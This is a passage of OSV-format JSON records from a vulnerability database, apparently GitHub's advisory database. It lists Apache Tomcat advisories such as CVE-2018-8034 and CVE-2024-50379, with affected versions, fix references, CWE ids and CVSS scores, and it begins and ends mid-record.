"ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49124" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/28726cc2e63bed68771f5eb0f65a78dc7080571823" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/c56456cda8151c9504dfb7985700824559d769a7" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/e0e07812224d327a321babb554f5a5758d30cc49" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/lnow7tt2j6hb9kcpkggx32ht6o90vqzv" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.42" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.8" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.106" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/06/16/3" } ], "database_specific": { "cwe_ids": [ "CWE-426" ], "github_reviewed": true, "github_reviewed_at": "2025-10-29T16:05:26Z", "nvd_published_at": "2025-06-16T15:15:24Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-46j3-r4pj-4835", "published": "2018-10-17T16:32:43Z", "modified": "2024-10-21T19:23:25.912196Z", "aliases": [ "CVE-2018-8034" ], "summary": "The host name verification missing in Apache Tomcat", "details": "The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.10" } ] } ], "versions": [ "9.0.1", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.9", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-46j3-r4pj-4835/GHSA-46j3-r4pj-4835.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.32" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-46j3-r4pj-4835/GHSA-46j3-r4pj-4835.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.0.53" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.8", "8.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-46j3-r4pj-4835/GHSA-46j3-r4pj-4835.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.35" }, { "fixed": "7.0.90" } ] } ], "versions": [ "7.0.35", "7.0.37", "7.0.39", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.88", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-46j3-r4pj-4835/GHSA-46j3-r4pj-4835.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8034" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2c522795166c930741a9cecca76797bf48cb1634" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2835bb4e030c1c741ed0847bb3b9c3822e4fbc8a" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00047.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00001.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180817-0001" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3723-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227102810/http://www.securityfocus.com/bid/104895" }, { "type": "WEB", "url": "https://web.archive.org/web/20200517032514/http://www.securitytracker.com/id/1041374" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4281" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0130" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0131" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0451" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1162" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1529" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2205" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4%40%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201807.mbox/%3C20180722091057.GA70283%40minotaur.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201807.mbox/%3C20180722091057.GA70283@minotaur.apache.org%3E" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/104895" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041374" } ], "database_specific": { "cwe_ids": [ "CWE-295" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:57:40Z", "nvd_published_at": "2018-08-01T18:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5j33-cvvr-w245", "published": "2024-12-17T15:31:43Z", "modified": "2025-11-03T22:00:31.720080Z", "aliases": [ "BIT-tomcat-2024-50379", "CVE-2024-50379" ], "related": [ "CGA-5749-245m-24vg" ], "summary": "Apache Tomcat Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability", "details": "Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability during JSP compilation in Apache Tomcat permits an RCE on case insensitive file systems when the default servlet is enabled for write (non-default configuration).\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.2" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.34" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.98" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.2" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.34" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.98" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50379" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/05ddeeaa54df1e2dc427d0164bedd6b79f78d81f" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/43b507ebac9d268b1ea3d908e296cc6e46795c00" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/631500b0c9b2a2a2abb707e3de2e10a5936e5d41" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/684247ae85fa633b9197b32391de59fc54703842" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8554f6b1722b33a2ce8b0a3fad37825f3a75f2d2" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/cc7a98b57c6dc1df21979fcff94a36e068f4456c" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/y6lj6q1xnp822g6ro70tn19sgtjmr80r" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250103-0003" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.34" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.2" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.98" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/12/17/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/12/18/2" } ], "database_specific": { "cwe_ids": [ "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2024-12-17T16:39:38Z", "nvd_published_at": "2024-12-17T13:15:18Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5q99-f34m-67gc", "published": "2018-10-17T16:31:02Z", "modified": "2024-03-11T05:31:33.810503Z", "aliases": [ "CVE-2018-11784" ], "summary": "Apache Tomcat Open Redirect vulnerability", "details": "When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.34" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", 